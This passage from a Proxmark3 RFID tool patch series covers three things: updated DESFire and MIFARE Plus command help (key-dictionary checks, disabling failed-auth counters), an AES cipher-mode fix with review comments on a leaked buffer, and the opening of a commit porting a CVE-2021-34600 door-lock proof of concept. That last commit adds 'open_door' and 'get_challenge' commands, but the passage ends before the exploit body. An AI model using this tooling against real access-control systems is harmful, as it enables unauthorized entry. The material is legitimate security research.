read", 
@@ -5159,36 +5215,36 @@ "hf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 -> read one last record from record file. use default channel settings from `default` command", "hf mfdes read --aid 123456 --fid 10 --type data -c iso -> read file via iso channel: app=123456, short iso id=10, offset=0.", "hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso -> read file via iso channel: app=123456, iso id=1000, offset=0. select via native iso wrapper", - "hf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso -> read file via iso channel: app iso id=0102, iso id=1000, offset=0. select via iso commands", - "hf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 -> get one record (number 5) from file 1100 via iso commands", - "hf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 -> get all record (from 5 to 1) from file 1100 via iso commands", - "hf mfdes read --appisoid df01 --fid 00 -s lrp -t aes --length 000010 -> read via lrp channel", - "hf mfdes read --appisoid df01 --fid 00 -s ev2 -t aes --length 000010 --isochain -> read desfire light via ev2 channel" + "hf mfdes read --isoid 0102 --fileisoid 1000 --type data -c iso -> read file via iso channel: app iso id=0102, iso id=1000, offset=0. 
select via iso commands", + "hf mfdes read --isoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 -> get one record (number 5) from file 1100 via iso commands", + "hf mfdes read --isoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 -> get all record (from 5 to 1) from file 1100 via iso commands", + "hf mfdes read --isoid df01 --fid 00 -s lrp -t aes --length 000010 -> read via lrp channel", + "hf mfdes read --isoid df01 --fid 00 -s ev2 -t aes --length 000010 --isochain -> read desfire light via ev2 channel" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", "--no-auth execute without authentication", - "--type file type auto/data(standard/backup)/value/record(linear/cyclic)/mac). auto - check file settings and then read. default: auto", - "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). 
default 0", - "-l, --length length to read (3 hex bytes, big endian -> 000000 = read all data). for records - records count (0 - all). default 0.", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso read commands.", + "--type file type, auto - check file settings and then read. (def: auto)", + "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). (def: 0)", + "-l, --length length to read (3 hex bytes, big endian -> 000000 = read all data). for records - records count (0 - all). (def: 0)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso read commands", "--isochain use iso chaining commands. switched on by default if secure channel = lrp" ], - "usage": "hf mfdes read [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-l ] [--appisoid ] [--fileisoid ] [--isochain]" + "usage": "hf mfdes read [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-l ] [--isoid ] [--fileisoid ] [--isochain]" }, "hf mfdes selectapp": { "command": "hf mfdes selectapp", 
@@ -5205,28 +5261,29 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of application for some parameters (3 hex bytes, big endian)", - "--dfname application df name (string, max 16 chars). selects application via iso select command", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of application for some parameters (3 hex bytes, big endian)", + "--dfname application df name (string, max 16 chars). selects application via iso select command", "--mf select mf (master file) via iso channel", - "--isoid application iso id (iso df id) (2 hex bytes, big endian)", - "--fileisoid select file inside application by iso id (iso df id) (2 hex bytes, big endian)." + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fileisoid select file inside application by iso id (iso df id) (2 hex bytes, big endian)." 
], - "usage": "hf mfdes selectapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--dfname ] [--mf] [--isoid ] [--fileisoid ]" + "usage": "hf mfdes selectapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--dfname ] [--mf] [--isoid ] [--fileisoid ]" }, "hf mfdes setconfig": { "command": "hf mfdes setconfig", "description": "set card configuration. warning! danger zone! needs to provide card's master key and works if not blocked by config.", "notes": [ - "more about options mf2dlhx0.pdf. options list:", + "more about options mf2dlhx0.pdf.", + "options list:", "00h picc configuration.", "02h ats update.", "03h sak update", 
@@ -5240,29 +5297,29 @@ "", "hf mfdes setconfig --param 03 --data 0428 -> set sak", "hf mfdes setconfig --param 02 --data 0875778102637264 -> set ats (first byte - length)", - "hf mfdes setconfig --appisoid df01 -t aes -s ev2 --param 05 --data 00000000020000000000 -> set lrp mode enable for desfire light", - "hf mfdes setconfig --appisoid df01 -t aes -s ev2 --param 0a --data 00ffffffff -> disable failed auth counters for desfire light", - "hf mfdes setconfig --appisoid df01 -t aes -s lrp --param 0a --data 00ffffffff -> disable failed auth counters for desfire light via lrp channel" + "hf mfdes setconfig --isoid df01 -t aes -s ev2 --param 05 --data 00000000020000000000 -> set lrp mode enable for desfire light", + "hf mfdes setconfig --isoid df01 -t aes -s ev2 --param 0a --data 00ffffffff -> disable failed auth counters for desfire light", + "hf mfdes setconfig --isoid df01 -t aes -s lrp --param 0a --data 00ffffffff -> disable failed auth counters for desfire light via lrp" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of application for some parameters (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "-p, --param parameter id (hex 1 byte)", - "-d, --data data for parameter (hex 1..30 bytes)" - ], - "usage": "hf mfdes setconfig [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [-p ] [-d ]" + "-v, --verbose verbose mode", + "-n, 
--keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of application for some parameters (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "-p, --param parameter id (1 hex byte)", + "-d, --data data for parameter (1..30 hex bytes)" + ], + "usage": "hf mfdes setconfig [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [-p ] [-d ]" }, "hf mfdes test": { "command": "hf mfdes test", 
@@ -5282,31 +5339,31 @@ "notes": [ "hf mfdes value --aid 123456 --fid 01 -> get value app=123456, file=01 with defaults from `default` command", "hf mfdes value --aid 123456 --fid 01 --op credit -d 00000001 -> credit value app=123456, file=01 with defaults from `default` command", - "hf mfdes value -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> get value with default factory setup", - "hf mfdes val --appisoid df01 --fid 03 -s lrp -t aes -n 1 --op credit --d 00000001 -m encrypt -> credit value in the lrp encrypted mode", - "hf mfdes val --appisoid df01 --fid 03 -s lrp -t aes -n 1 --op get -m plain -> get value in plain (nevertheless of mode) works for desfire light (look setconfiguration option 0x09)" + "hf mfdes value -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> get value with default factory setup", + "hf mfdes val --isoid df01 --fid 03 -s lrp -t aes -n 1 --op credit --d 00000001 -m encrypt -> credit value in the lrp encrypted mode", + "hf mfdes val --isoid df01 --fid 03 -s lrp -t aes -n 1 --op get -m plain -> get value in plain (nevertheless of mode) works for desfire light (look setconfiguration option 0x09)" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt 
algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", "-o, --op operation: get(default)/credit/limcredit(limited credit)/debit/clear. operation clear: get-getopt-debit to min value", - "-d, --data value for operation (hex 4 bytes)", + "-d, --data value for operation (hex 4 bytes)", "--no-auth execute without authentication" ], - "usage": "hf mfdes value [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [-o ] [-d ] [--no-auth]" + "usage": "hf mfdes value [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [-o ] [-d ] [--no-auth]" }, "hf mfdes write": { "command": "hf mfdes write", 
@@ -5323,39 +5380,39 @@ "hf mfdes write --aid 123456 --fid 01 --type record -d 01020304 -> write data to record file", "hf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 -> update record in the record file. record 0 - lastest record.", "hf mfdes write --aid 123456 --fid 01 --type record --offset 000000 -d 11223344 -> write record to record file. use default channel settings from `default` command", - "hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 -> write data to std/backup file via iso commandset", - "hf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 -> send record to record file via iso commandset", + "hf mfdes write --isoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 -> write data to std/backup file via iso commandset", + "hf mfdes write --isoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 -> send record to record file via iso commandset", "hf mfdes write --aid 123456 --fid 01 -d 01020304 --readerid 010203 -> write data to file with commitreaderid command before write and committransaction after write", - "hf mfdes write --appisoid df01 --fid 04 -d 01020304 --trkey 00112233445566778899aabbccddeeff --readerid 5532 -t aes -s lrp -> advanced commitreaderid via lrp channel sample" + "hf mfdes write --isoid df01 --fid 04 -d 01020304 --trkey 00112233445566778899aabbccddeeff --readerid 5532 -t aes -s lrp -> advanced commitreaderid via lrp channel sample" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command 
set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--fid file id (1 hex byte)", "--no-auth execute without authentication", - "--type file type auto/data(standard/backup)/value/record(linear/cyclic)/mac). auto - check file settings and then write. default: auto", - "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). default 0", + "--type file type, auto - check file settings and then write. (def: auto)", + "-o, --offset file offset (3 hex bytes, big endian). for records - record number (0 - lastest record). (def: 0)", "-d, --data data for write (data/record file), credit/debit(value file)", "--debit use for value file debit operation instead of credit", - "--commit commit needs for backup file only. for the other file types and in the `auto` mode - command set it automatically.", - "--updaterec record number for update record command. updates record instead of write. lastest record - 0", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso write commands.", - "--readerid reader id for commitreaderid command. if present - the command issued before write command.", - "--trkey key for decode previous reader id." + "--commit commit needs for backup file only. for the other file types and in the `auto` mode - command set it automatically", + "--updaterec record number for update record command. 
updates record instead of write. lastest record - 0", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fileisoid file iso id (iso df id) (2 hex bytes, big endian). works only for iso write commands", + "--readerid reader id for commitreaderid command. if present - the command issued before write command", + "--trkey key for decode previous reader id" ], - "usage": "hf mfdes write [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-d ] [--debit] [--commit] [--updaterec ] [--appisoid ] [--fileisoid ] [--readerid ] [--trkey ]" + "usage": "hf mfdes write [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-d ] [--debit] [--commit] [--updaterec ] [--isoid ] [--fileisoid ] [--readerid ] [--trkey ]" }, "hf mfp auth": { "command": "hf mfp auth", @@ -5367,7 +5424,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", + "-v, --verbose verbose mode", "--ki key number, 2 hex bytes", "--key key, 16 hex bytes" ], @@ -5375,7 +5432,7 @@ }, "hf mfp chk": { "command": "hf mfp chk", - "description": "checks keys with mifare plus card.", + "description": "checks keys on mifare plus card", "notes": [ "hf mfp chk -k 000102030405060708090a0b0c0d0e0f -> check key on sector 0 as key a and b", "hf mfp chk -s 2 -a -> check default key list on sector 2, key a", 
@@ -5386,17 +5443,19 @@ "offline": false, "options": [ "-h, --help this help", - "-a, --keya check only key a (by default check all keys).", - "-b, --keyb check only key b (by default check all keys).", - "-k, --key key for checking (hex 16 bytes)", - "-d, --dict file with keys dictionary", + "-a, --keya check only key a (def: check all keys)", + "-b, --keyb check only key b (def: check all keys)", + "-s, --startsec <0..255> start sector number", + "-e, --endsec <0..255> end sector number", + "-k, --key key for checking (hex 16 bytes)", + "-d, --dict dictionary file with keys", "--pattern1b check all 1-byte combinations of key (0000...0000, 0101...0101, 0202...0202, ...)", "--pattern2b check all 2-byte combinations of key (0000...0000, 0001...0001, 0002...0002, ...)", "--startp2b start key (2-byte hex) for 2-byte search (use with `--pattern2b`)", - "-j, --json json file to save keys", - "-v, --verbose verbose mode." + "-j, --json json filename to save keys", + "-v, --verbose verbose mode" ], - "usage": "hf mfp chk [-habv] [-s start sector num (0..255)] [-e end sector num (0..255)] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ]" + "usage": "hf mfp chk [-habv] [-s <0..255>] [-e <0..255>] [-k ] [-d ] [--pattern1b] [--pattern2b] [--startp2b ] [-j ]" }, "hf mfp commitp": { "command": "hf mfp commitp", @@ -5407,7 +5466,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data." + "-v, --verbose verbose mode" ], "usage": "hf mfp commitp [-hv]" }, @@ -5433,7 +5492,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", + "-v, --verbose verbose mode", "-k, --key key, 16 hex bytes" ], "usage": "hf mfp initp [-hv] [-k ]" 
@@ -5449,13 +5508,13 @@ "options": [ "-h, --help this help", "-v, --verbose show technical data", - "--aid print all sectors with aid", - "-k, --key key for printing sectors", - "-b, --keyb use key b for access printing sectors (by default: key a)", - "--be (optional, bigendian)", + "--aid print all sectors with aid", + "-k, --key key for printing sectors", + "-b, --keyb use key b for access printing sectors (def: key a)", + "--be (optional: bigendian)", "--dch decode card holder information" ], - "usage": "hf mfp mad [-hvb] [--aid ] [-k ] [--be] [--dch]" + "usage": "hf mfp mad [-hvb] [--aid ] [-k ] [--be] [--dch]" }, "hf mfp ndefread": { "command": "hf mfp ndefread", @@ -5487,14 +5546,14 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data", - "-n, --count blocks count (by default 1)", - "-b, --keyb use key b (by default keya)", + "-v, --verbose verbose mode", + "-n, --count blocks count (def: 1)", + "-b, --keyb use key b (def: keya)", "-p, --plain plain communication mode between reader and card", - "--blk block number (0..255)", + "--blk <0..255> block number", "--key key, 16 hex bytes" ], - "usage": "hf mfp rdbl [-hvbp] [-n ] --blk [--key ]" + "usage": "hf mfp rdbl [-hvbp] [-n ] --blk <0..255> [--key ]" }, "hf mfp rdsc": { "command": "hf mfp rdsc", @@ -5506,13 +5565,13 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", - "-b, --keyb use key b (by default keya).", - "-p, --plain plain communication mode between reader and card.", - "-s, --sn sector number (0..255)", + "-v, --verbose verbose mode", + "-b, --keyb use key b (def: keya)", + "-p, --plain plain communication mode between reader and card", + "-s, --sn <0..255> sector number", "-k, --key key, 16 hex bytes" ], - "usage": "hf mfp rdsc [-hvbp] -s [-k ]" + "usage": "hf mfp rdsc [-hvbp] -s <0..255> [-k ]" }, "hf mfp wrbl": { "command": "hf mfp wrbl", 
@@ -5524,13 +5583,13 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", - "-b, --keyb use key b (by default keya).", - "--blk block number (0..255)", + "-v, --verbose verbose mode", + "-b, --keyb use key b (def: keya)", + "--blk <0..255> block number", "-d, --data data, 16 hex bytes", "-k, --key key, 16 hex bytes" ], - "usage": "hf mfp wrbl [-hvb] --blk -d [-k ]" + "usage": "hf mfp wrbl [-hvb] --blk <0..255> -d [-k ]" }, "hf mfp wrp": { "command": "hf mfp wrp", @@ -5542,7 +5601,7 @@ "offline": false, "options": [ "-h, --help this help", - "-v, --verbose show internal data.", + "-v, --verbose verbose mode", "--ki key number, 2 hex bytes", "--key key, 16 hex bytes" ], @@ -10343,8 +10402,8 @@ } }, "metadata": { - "commands_extracted": 603, + "commands_extracted": 605, "extracted_by": "PM3Help2JSON v1.00", - "extracted_on": "2022-02-05T11:30:03" + "extracted_on": "2022-02-09T14:20:29" } } \ No newline at end of file diff --git a/doc/commands.md b/doc/commands.md index 0890285adb..35444f00b5 100644 --- a/doc/commands.md +++ b/doc/commands.md 
@@ -137,17 +137,17 @@ Check column "offline" for their availability. |command |offline |description |------- |------- |----------- |`emv help `|Y |`This help` -|`emv exec `|N |`Executes EMV contactless transaction.` -|`emv pse `|N |`Execute PPSE. It selects 2PAY.SYS.DDF01 or 1PAY.SYS.DDF01 directory.` -|`emv search `|N |`Try to select all applets from applets list and print installed applets.` -|`emv select `|N |`Select applet.` -|`emv gpo `|N |`Execute GetProcessingOptions.` -|`emv readrec `|N |`Read files from card.` -|`emv genac `|N |`Generate ApplicationCryptogram.` -|`emv challenge `|N |`Generate challenge.` -|`emv intauth `|N |`Internal authentication.` -|`emv scan `|N |`Scan EMV card and save it contents to json file for emulator.` -|`emv test `|Y |`Crypto logic test.` +|`emv exec `|N |`Executes EMV contactless transaction` +|`emv pse `|N |`Execute PPSE. It selects 2PAY.SYS.DDF01 or 1PAY.SYS.DDF01 directory` +|`emv search `|N |`Try to select all applets from applets list and print installed applets` +|`emv select `|N |`Select applet` +|`emv gpo `|N |`Execute GetProcessingOptions` +|`emv readrec `|N |`Read files from card` +|`emv genac `|N |`Generate ApplicationCryptogram` +|`emv challenge `|N |`Generate challenge` +|`emv intauth `|N |`Internal authentication` +|`emv scan `|N |`Scan EMV card and save it contents to json file for emulator` +|`emv test `|Y |`Crypto logic test` |`emv list `|Y |`List ISO7816 history` |`emv roca `|N |`Extract public keys and run ROCA test` @@ -252,6 +252,8 @@ Check column "offline" for their availability. |`hf cipurse formatall `|N |`Erase all the data from chip` |`hf cipurse create `|N |`Create file, application, key via DGI record` |`hf cipurse delete `|N |`Delete file` +|`hf cipurse updkey `|N |`Update key` +|`hf cipurse updakey `|N |`Update key attributes` |`hf cipurse default `|N |`Set default key and file id for all the other commands` |`hf cipurse test `|Y |`Tests` 
From 611dbbc89231974a51c0404cf862344fd440b107 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ya=C5=9Far=20Klawohn?= Date: Wed, 9 Feb 2022 15:21:34 +0100 Subject: [PATCH 2/3] Fix device desfire AES en-/decryption This commit fixes `mifare_cypher_single_block()` when used with `T_AES`. `mifare_cypher_single_block()` essentially re-implements CBC mode for all used ciphers by XOR-ing the IV with the data either before encryption or after decryption and using AES in ECB mode. However, for AES encryption `mbedtls_aes_crypt_cbc()` was then called to perform the en-/decryption operation, which then also XOR-ed the IV with the data, all of which resulted in the wrong en-/decryption of the data. This is fixed by replacing the call to `mbedtls_aes_crypt_cbc()` with a call to `mbedtls_aes_crypt_ecb()`. --- armsrc/desfire_crypto.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/armsrc/desfire_crypto.c b/armsrc/desfire_crypto.c
index 84361e2c34..9dbf951ebf 100644
--- a/armsrc/desfire_crypto.c
+++ b/armsrc/desfire_crypto.c
@@ -612,7 +612,9 @@ void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes
 break;
 }
- free(edata);
+ // TODO it doesn't build with this uncommented
+ // desfire_crypto.c:(.text.mifare_cryto_postprocess_data+0x4c): undefined reference to `free'
+ //free(edata);
 break;
 case MDCM_ENCIPHERED:
@@ -811,13 +813,13 @@ void mifare_cypher_single_block(desfirekey_t key, uint8_t *data, uint8_t *ivect,
 case MCO_ENCYPHER: {
 mbedtls_aes_init(&actx);
 mbedtls_aes_setkey_enc(&actx, key->data, 128);
- mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_ENCRYPT, sizeof(edata), ivect, data, edata);
+ mbedtls_aes_crypt_ecb(&actx, MBEDTLS_AES_ENCRYPT, data, edata);
 break;
 }
 case MCO_DECYPHER: {
 mbedtls_aes_init(&actx);
 mbedtls_aes_setkey_dec(&actx, key->data, 128);
- mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_DECRYPT, sizeof(edata), ivect, edata, data);
+ mbedtls_aes_crypt_ecb(&actx, MBEDTLS_AES_DECRYPT, data, edata);
 break;
 }
 }
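Review bot: Commenting out `free(edata)` in the `@@ -612` hunk trades a link error for a buffer that is never released on this path, and the `// TODO` records the linker symptom rather than a fix. The allocation of `edata` is outside the hunk, so how it is obtained cannot be confirmed from here; whatever allocator provides it on the device, this path needs that allocator's matching release, or a fixed-size buffer that needs none. Until that is resolved, replace the dead line with a comment that states the consequence, e.g. `// FIXME: edata is not released on this path; firmware build has no free()`. mifare_cryto_postprocess_data starts and ends outside the hunk.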
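Review bot: In the `@@ -811` hunk the decrypt branch now passes `data` as input and `edata` as output, the reverse of the removed `mbedtls_aes_crypt_cbc(..., edata, data)` call, while the commit message only describes the CBC-to-ECB switch. Whether the new order is right depends on code after the switch that is outside the hunk (presumably `edata` is copied back into `data`), so a comment on both calls such as `// in: data, out: edata; the XOR with ivect around this call provides the chaining` would make the intent checkable. Both branches also `break` right after the cipher call without `mbedtls_aes_free(&actx);`, which leaves the expanded key schedule in `actx`; unless the context is released after the switch, add that call before each `break`. mifare_cypher_single_block starts and ends outside the hunk.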
From 5fd35c5980e196d8e40f41537a95f7afa4718a6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ya=C5=9Far=20Klawohn?= Date: Wed, 9 Feb 2022 15:36:01 +0100 Subject: [PATCH 3/3] Port CVE-2021-34600 poc Add support for performing the attack on systems affected by CVE-2021-34600. For this, this commit adds the commands `hf mfdesbrute get_challenge` and `hf mfdesbrute open_door`. --- armsrc/Makefile | 2 +- armsrc/appmain.c | 23 + armsrc/mfdessimulate.c | 832 ++++++++++++++++++++++++++++++++ armsrc/mfdessimulate.h | 10 + client/CMakeLists.txt | 1 + client/Makefile | 1 + client/src/cmdhf.c | 2 + client/src/cmdhfmfdesbrute.c | 246 ++++++++++ client/src/cmdhfmfdesbrute.h | 28 ++ client/src/pm3line_vocabulory.h | 3 + doc/commands.json | 43 +- doc/commands.md | 11 + include/pm3_cmd.h | 3 + include/protocols.h | 5 + 14 files changed, 1202 insertions(+), 8 deletions(-) create mode 100644 armsrc/mfdessimulate.c create mode 100644 armsrc/mfdessimulate.h create mode 100644 client/src/cmdhfmfdesbrute.c create mode 100644 client/src/cmdhfmfdesbrute.h
diff --git a/armsrc/Makefile b/armsrc/Makefile
index 968dc445d7..60839e110a 100644
--- a/armsrc/Makefile
+++ b/armsrc/Makefile
@@ -36,7 +36,7 @@ APP_CFLAGS = $(PLATFORM_DEFS) \
 SRC_LF = lfops.c lfsampling.c pcf7931.c lfdemod.c lfadc.c
 SRC_ISO15693 = iso15693.c iso15693tools.c
-SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c epa.c mifaresim.c
+SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c epa.c mifaresim.c mfdessimulate.c
 #UNUSED: mifaresniff.c
 SRC_ISO14443b = iso14443b.c
 SRC_FELICA = felica.c
diff --git a/armsrc/appmain.c b/armsrc/appmain.c
index 22871a00d7..c6a72945b3 100644
--- a/armsrc/appmain.c
+++ b/armsrc/appmain.c
@@ -52,6 +52,7 @@
 #include "lfzx.h"
 #include "mifarecmd.h"
 #include "mifaredesfire.h"
+#include "mfdessimulate.h"
 #include "mifaresim.h"
 #include "pcf7931.h"
 #include "Standalone/standalone.h"
@@ -1657,6 +1658,28 @@ static void PacketReceived(PacketCommandNG *packet) {
 MifareHasStaticNonce();
 break;
 }
+ case CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE: {
+ struct p {
+ uint8_t tagtype;
+ uint16_t flags;
+ uint8_t uid[10];
+ uint8_t key[16];
+ } PACKED;
+ struct p *payload = (struct p *) packet->data.asBytes;
+ SimulateMfDesfireEv1(payload->tagtype, payload->flags, payload->uid, payload->key, CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE);
+ break;
+ }
+ case CMD_HF_MIFARE_EV1_OPEN_DOOR: {
+ struct p {
+ uint8_t tagtype;
+ uint16_t flags;
+ uint8_t uid[10];
+ uint8_t key[16];
+ } PACKED;
+ struct p *payload = (struct p *) packet->data.asBytes;
+ SimulateMfDesfireEv1(payload->tagtype, payload->flags, payload->uid, payload->key, CMD_HF_MIFARE_EV1_OPEN_DOOR);
+ break;
+ }
 #endif
 #ifdef WITH_NFCBARCODE
diff --git a/armsrc/mfdessimulate.c b/armsrc/mfdessimulate.c
new file mode 100644
index 0000000000..ba66ee93d8
--- /dev/null
+++ b/armsrc/mfdessimulate.c
